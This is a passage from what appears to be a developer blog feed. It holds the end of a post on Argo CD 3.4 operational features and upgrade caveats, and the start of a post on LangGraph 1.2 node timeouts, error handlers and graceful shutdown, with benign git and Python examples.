&lt;p&gt;3.4 also added the ability to send &lt;strong&gt;custom User-Agent headers&lt;/strong&gt; for Helm repository requests (PR #25473) — handy when an internal artifact proxy or OCI registry requires client identification.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Source Hydrator — Commit Authorship and UI Integration
&lt;/h2&gt;

&lt;p&gt;The Source Hydrator that landed in 3.3 is a first-class implementation of the rendered-manifests pattern: it renders the source (dry source) kept in Git and commits it to a separate hydrated branch. Put it into production, though, and one thing grates immediately — &lt;strong&gt;every hydration commit has the same anonymous author&lt;/strong&gt;, rendering audit logs and &lt;code&gt;git blame&lt;/code&gt; meaningless.&lt;/p&gt;

&lt;p&gt;3.4 makes the &lt;strong&gt;authorName/Email used for hydration commits configurable&lt;/strong&gt; (PR #25746). It stamps an identity into the commit metadata — "this hydrate commit was made by which environment/bot" — restoring audit trails and accountability. After applying the setting, you can verify the identity is stamped correctly straight from the hydrated branch's commit log.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Verify the hydrated branch's commit author is stamped with the bot identity&lt;/span&gt;
&lt;span class="c"&gt;# (Source Hydrator renders the dry source and commits it to a separate hydrated branch)&lt;/span&gt;
git fetch origin environments/prod
git log origin/environments/prod &lt;span class="nt"&gt;--pretty&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'%h | %an &amp;lt;%ae&amp;gt; | %s'&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; 5

&lt;span class="c"&gt;# Expected output - before authorName/Email is set: anonymous/identical author&lt;/span&gt;
&lt;span class="c"&gt;#   3f1a2b9 | argocd &amp;lt;argocd@noreply&amp;gt; | hydrate: payments @ a1b2c3d&lt;/span&gt;
&lt;span class="c"&gt;# After: environment/bot identity is clearly distinguished&lt;/span&gt;
&lt;span class="c"&gt;#   9c8d7e6 | argocd-hydrator-prod &amp;lt;gitops-bot+prod@manoit.co.kr&amp;gt; | hydrate: payments @ a1b2c3d&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On top of that came UI integration — you can enable the hydrator from the app-create panel (#26485) and view hydrator properties directly in the Summary tab (#26152). On the stability side, &lt;code&gt;GetDrySource()&lt;/code&gt; was fixed to preserve all source-type fields (cherry-pick #27189→#27196), and a batch of 3.3-era hydrator bugs (missing hydrated SHA on no-ops, missing creds) were cleaned up.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Area&lt;/th&gt;
&lt;th&gt;3.4 change&lt;/th&gt;
&lt;th&gt;Operational effect&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Commit metadata&lt;/td&gt;
&lt;td&gt;authorName/Email configurable (#25746)&lt;/td&gt;
&lt;td&gt;Restores audit log / blame&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UI&lt;/td&gt;
&lt;td&gt;Hydrator toggle in create panel (#26485), Summary tab exposure (#26152)&lt;/td&gt;
&lt;td&gt;Config visibility, fewer mistakes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stability&lt;/td&gt;
&lt;td&gt;GetDrySource field preservation, no-op SHA/creds fixes&lt;/td&gt;
&lt;td&gt;Higher hydration reliability&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  5. ApplicationSet Operability — Health Field, Watch, listResourceEvents
&lt;/h2&gt;

&lt;p&gt;The real unit of large-scale GitOps isn't a single &lt;code&gt;Application&lt;/code&gt; — it's the &lt;strong&gt;ApplicationSet (AppSet)&lt;/strong&gt;. In a structure that stamps out tens to hundreds of apps at once via cluster/directory/Git generators, 3.4 elevates AppSet into a first-class, operable object.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Health field added to status&lt;/strong&gt; (#25753) — read overall AppSet health directly from status, no need to manually aggregate hundreds of child apps.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ApplicationSet Watch API&lt;/strong&gt; (#26409) and &lt;strong&gt;listResourceEvents API&lt;/strong&gt; (#25537) — standard APIs to stream/query AppSet changes and events. External dashboards and automation attach via watch instead of polling.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Controller performance/correctness&lt;/strong&gt; — the path that fetches cluster secrets was optimized, and AppSets in disallowed namespaces no longer trigger unnecessary reconciles on cluster-secret changes (#25622). A DuckType generator panic on non-string values was also fixed (cherry-pick #27265→#27526).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The UI gained an AppSet slide-out summary, a tree-view detail page, and a list page, completing the "operate AppSets visually" experience.&lt;/p&gt;

&lt;h2&gt;
  
  
  6. Notification &amp;amp; Networking — appProject Access and gRPC DNS TXT Opt-Out
&lt;/h2&gt;

&lt;p&gt;Notifications are also core to Day-2. 3.4 lets notification templates &lt;strong&gt;access appProject information&lt;/strong&gt; (#26470) — so you can put "which project's app failed to sync" directly into the alert body, sharpening routing accuracy. It also &lt;strong&gt;exposes the notifications controller's processors count as a command parameter&lt;/strong&gt; (#26798) to tune throughput in high-volume alert environments.&lt;/p&gt;

&lt;p&gt;The most operationally relevant networking change is &lt;strong&gt;disabling gRPC service-config DNS TXT lookups by default&lt;/strong&gt; (#26077). It looks small but the root cause runs deep — in dual-stack (IPv4+IPv6) Kubernetes environments, gRPC clients excessively queried DNS TXT records looking for service config, causing timeouts and latency. 3.4 turns that lookup off by default, improving controller stability on dual-stack clusters.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you've experienced "Argo CD intermittently slowing down" on a dual-stack cluster, the 3.4 upgrade alone may make the symptom disappear. This change is a default, so no extra configuration is required.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  7. Upgrade Watch-Outs — Helm 3.19 K8s Version Interpretation, Dex 2.45, MS Teams O365 Connectors
&lt;/h2&gt;

&lt;p&gt;3.4 is an operations-hardening release with a light migration burden, but check these three before upgrading.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;Change&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Helm 3.19.0&lt;/td&gt;
&lt;td&gt;How Helm interprets the K8s cluster version changed → Argo CD aligns to it&lt;/td&gt;
&lt;td&gt;Regression-test charts that depend on &lt;code&gt;.Capabilities.KubeVersion&lt;/code&gt; rendering&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dex 2.45.0&lt;/td&gt;
&lt;td&gt;Bundled Dex version upgrade (SSO)&lt;/td&gt;
&lt;td&gt;Validate Dex connector config / OIDC flow in staging&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MS Teams notifications&lt;/td&gt;
&lt;td&gt;Microsoft deprecates and removes legacy Office 365 Connectors&lt;/td&gt;
&lt;td&gt;Migrate Teams webhook delivery to the new mechanism&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;WARNING:&lt;/strong&gt; if you were sending Teams notifications via O365 Connector webhooks, this is not "optional" but "required." Microsoft's deprecation breaks the existing path, so alert delivery itself may stop independent of the 3.4 upgrade.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  8. ManoIT Internal Adoption Checklist
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Task&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done criteria&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Upgrade to 3.4.x in staging, reflect non-HA→HA manifest diffs&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;All apps Synced/Healthy post-upgrade&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Helm 3.19 K8s version interpretation — regression-test KubeVersion-dependent charts&lt;/td&gt;
&lt;td&gt;Chart owners&lt;/td&gt;
&lt;td&gt;Render diff = 0 (excl. intended changes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Add cluster pause annotation to the incident runbook&lt;/td&gt;
&lt;td&gt;SRE&lt;/td&gt;
&lt;td&gt;Pause/resume/diff procedure validated in a mock incident&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Reorganize per-env values into glob rules (prefix ordering)&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;Deterministic merge order (snapshot test)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Assign per-env bot identity for Source Hydrator commit author (authorName/Email)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Identity visible in hydrated-branch blame&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Move external dashboards from polling to AppSet Health field + Watch API&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;Lower dashboard latency, fewer API calls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Add appProject context to notification templates, migrate MS Teams path&lt;/td&gt;
&lt;td&gt;SRE&lt;/td&gt;
&lt;td&gt;Per-project routing + Teams delivery working&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Measure gRPC DNS TXT-off effect (latency p99) on dual-stack clusters&lt;/td&gt;
&lt;td&gt;Network&lt;/td&gt;
&lt;td&gt;Controller reconcile latency stabilized&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  9. Conclusion — "The Next GitOps Challenge Isn't Deployment, It's Operations"
&lt;/h2&gt;

&lt;p&gt;In one line, Argo CD 3.4 is a &lt;strong&gt;declaration that deployment automation is already a solved problem, and what remains is the Day-2 work of safely pausing, tracking, and routing that automation in the middle of an incident.&lt;/strong&gt; Per-cluster pause aligns the unit of incident response with reality (the cluster); Helm valueFiles globs collapse the environment explosion into one line; the Source Hydrator's commit authorship returns audit trails to the rendered-manifests pattern. ApplicationSet's Health/Watch/listResourceEvents elevate the real unit of large-scale GitOps to a first-class object, and the gRPC DNS TXT default opt-out quietly removes invisible latency on dual-stack environments.&lt;/p&gt;

&lt;p&gt;Three closing recommendations. (1) &lt;strong&gt;Before upgrading, check the Helm 3.19 impact and the MS Teams O365 Connector deprecation first&lt;/strong&gt; — neither tolerates "later." (2) &lt;strong&gt;Put cluster pause into your runbook first&lt;/strong&gt; — it's the change that raises incident-response capability the most for the least code. (3) &lt;strong&gt;If you use the Source Hydrator, set the commit author first&lt;/strong&gt; — auto-commits without an audit trail are a powder keg for operational incidents. The shortest one-line recommendation: &lt;em&gt;"This sprint, bump staging to 3.4 and run the cluster-pause → diff → selective-sync procedure once in a mock incident."&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1482680" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>devops</category>
      <category>gitops</category>
      <category>cicd</category>
    </item>
    <item>
      <title>LangGraph 1.2 Deep Dive — Per-Node Timeouts, Error Handlers, Graceful Shutdown, DeltaChannel &amp; Streaming v3</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Mon, 01 Jun 2026 01:58:10 +0000</pubDate>
      <link>https://dev.to/x4nent/langgraph-12-deep-dive-per-node-timeouts-error-handlers-graceful-shutdown-deltachannel--2mp2</link>
      <guid>https://dev.to/x4nent/langgraph-12-deep-dive-per-node-timeouts-error-handlers-graceful-shutdown-deltachannel--2mp2</guid>
      <description>&lt;p&gt;When you move an AI agent from demo to production, the first thing to break is almost always the &lt;strong&gt;long-running&lt;/strong&gt; path. An LLM call hangs at 30 seconds, an external tool stalls forever, or a rolling deploy SIGKILLs an in-flight agent — and that single failure wipes out tens of minutes of accumulated state. &lt;strong&gt;LangGraph 1.2.0&lt;/strong&gt; (released May 12, 2026) takes direct aim at exactly this. The official changelog summarizes it as "finer-grained control over node execution (timeouts, error recovery, and graceful shutdown), a new channel type that cuts checkpoint overhead for long-running threads, and a content-block-centric streaming API (v3)." The underlying idea is consistent: &lt;strong&gt;treat an agent run as a durable graph execution, not a Python function call.&lt;/strong&gt; This post breaks down the five new capabilities from an operations and architecture angle, and lays out how ManoIT rolled them into its internal agent pipeline.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why 1.2 — 1.0's durability, 1.1's type safety, 1.2's node control
&lt;/h2&gt;

&lt;p&gt;Context first. &lt;strong&gt;LangGraph 1.0&lt;/strong&gt; went GA in October 2025 with a promise of no breaking changes until 2.0, establishing durable state, checkpointer-based resumption, and first-class human-in-the-loop. &lt;strong&gt;1.1&lt;/strong&gt; (2026-03-10) added type-safe streaming/invoke and Pydantic/dataclass coercion behind an opt-in &lt;code&gt;version="v2"&lt;/code&gt;. And &lt;strong&gt;1.2&lt;/strong&gt; pushes fault-tolerance controls that previously existed only at the &lt;em&gt;whole-graph&lt;/em&gt; level down to the &lt;strong&gt;individual node&lt;/strong&gt; level.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;Released&lt;/th&gt;
&lt;th&gt;Theme&lt;/th&gt;
&lt;th&gt;Key API&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1.0.0&lt;/td&gt;
&lt;td&gt;2025-10-20&lt;/td&gt;
&lt;td&gt;Durable execution GA (persistence, resume, HITL)&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;checkpointer&lt;/code&gt;, &lt;code&gt;interrupt&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.1.0&lt;/td&gt;
&lt;td&gt;2026-03-10&lt;/td&gt;
&lt;td&gt;Type-safe streaming/invoke&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;version="v2"&lt;/code&gt;, &lt;code&gt;GraphOutput&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.0&lt;/td&gt;
&lt;td&gt;2026-05-12&lt;/td&gt;
&lt;td&gt;Node-level fault tolerance + streaming v3&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;timeout=&lt;/code&gt;, &lt;code&gt;error_handler=&lt;/code&gt;, &lt;code&gt;DeltaChannel&lt;/code&gt;, &lt;code&gt;version="v3"&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;One caveat up front: the new &lt;strong&gt;timeouts and error handlers are Python-only&lt;/strong&gt;, and timeouts work on &lt;strong&gt;async nodes only&lt;/strong&gt;. Retry policies, however, continue to work in both Python and TypeScript.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Per-node timeouts — the decisive difference between run_timeout and idle_timeout
&lt;/h2&gt;

&lt;p&gt;Previously there was no standard way to stop a single node from hanging forever. 1.2 adds &lt;code&gt;add_node(..., timeout=)&lt;/code&gt; to cap how long a single attempt may run. The key is that it &lt;strong&gt;separates two kinds of limits&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;run_timeout&lt;/code&gt;&lt;/strong&gt; — a hard wall-clock limit. "This attempt must finish within N seconds," regardless of progress.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;idle_timeout&lt;/code&gt;&lt;/strong&gt; — an idle limit that &lt;em&gt;resets on progress&lt;/em&gt;. It keeps a streaming LLM call (whose tokens keep flowing) alive while catching only a genuine stall.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You can supply both via &lt;code&gt;TimeoutPolicy&lt;/code&gt;. When a limit fires, LangGraph raises &lt;code&gt;NodeTimeoutError&lt;/code&gt;, &lt;strong&gt;clears the writes from that attempt&lt;/strong&gt;, and hands off to the retry policy — so a timeout never leaves partial state behind.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.graph&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;StateGraph&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.types&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;TimeoutPolicy&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;RetryPolicy&lt;/span&gt;

&lt;span class="c1"&gt;# NOTE: timeouts are async-node-only + Python-only
&lt;/span&gt;&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;call_model&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;AgentState&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# Streaming LLM call — idle_timeout resets while tokens flow
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;messages&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;llm&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;ainvoke&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;messages&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])]}&lt;/span&gt;

&lt;span class="n"&gt;builder&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;StateGraph&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AgentState&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;builder&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;add_node&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;call_model&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;call_model&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="c1"&gt;# Hard 90s cap, but abort if 15s pass with no progress
&lt;/span&gt;    &lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nc"&gt;TimeoutPolicy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;run_timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;90.0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;idle_timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;15.0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;retry_policy&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nc"&gt;RetryPolicy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_attempts&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;  &lt;span class="c1"&gt;# timeout -&amp;gt; handed to retry
&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Operational guidance: put a &lt;code&gt;run_timeout&lt;/code&gt; on external API/tool nodes to eliminate infinite waits, and use &lt;code&gt;idle_timeout&lt;/code&gt; on streaming LLM nodes to catch stalls without killing legitimately long responses. Supplying both is the safest default.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Node-level error handlers — first-class Saga / compensation
&lt;/h2&gt;

&lt;p&gt;When a node still fails after retries are exhausted, the whole graph used to blow up with an exception. 1.2 adds &lt;code&gt;add_node(..., error_handler=)&lt;/code&gt; — a &lt;strong&gt;recovery function that runs after all retries are exhausted&lt;/strong&gt;. The handler receives a typed &lt;code&gt;NodeError&lt;/code&gt; and can return a &lt;code&gt;Command&lt;/code&gt; to &lt;strong&gt;update state and route to a different node&lt;/strong&gt;. This expresses &lt;strong&gt;Saga / compensating transactions&lt;/strong&gt; — the "if one of several steps fails, roll back the earlier ones" pattern — declaratively inside the graph.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.types&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Command&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.errors&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;NodeError&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;on_payment_failed&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;OrderState&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;NodeError&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;Command&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# All retries failed -&amp;gt; compensate: release the reservation, route to rollback
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;Command&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;update&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;status&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;payment_failed&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;error&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)},&lt;/span&gt;
        &lt;span class="n"&gt;goto&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;release_inventory&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;# compensation node that rolls back the prior step
&lt;/span&gt;    &lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;builder&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;add_node&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;charge_payment&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;charge_payment&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;retry_policy&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nc"&gt;RetryPolicy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_attempts&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;error_handler&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;on_payment_failed&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;# called only after 3 failed attempts
&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The point is that you stop scattering exceptions across try/except blocks. The post-failure compensation flow becomes part of the graph topology, so failure paths show up in visualization, replay, and checkpoint analysis.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Graceful shutdown — deploy without losing state
&lt;/h2&gt;

&lt;p&gt;Killing an in-flight agent with SIGKILL during a rolling deploy or scale-down evaporates work in progress. 1.2's &lt;strong&gt;graceful shutdown&lt;/strong&gt; stops the run cooperatively &lt;strong&gt;right after the current superstep completes&lt;/strong&gt; and &lt;strong&gt;saves a resumable checkpoint&lt;/strong&gt;. Create a &lt;code&gt;RunControl&lt;/code&gt; and call &lt;code&gt;request_drain()&lt;/code&gt; from any thread; the run raises &lt;code&gt;GraphDrained&lt;/code&gt; and can be resumed later from exactly that point with the same config.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.runtime&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;RunControl&lt;/span&gt;

&lt;span class="n"&gt;run_control&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;RunControl&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="c1"&gt;# e.g. in a SIGTERM handler — drain safely when the deploy signal arrives
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;handle_sigterm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;signum&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;frame&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;run_control&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;request_drain&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;  &lt;span class="c1"&gt;# callable from any thread
&lt;/span&gt;
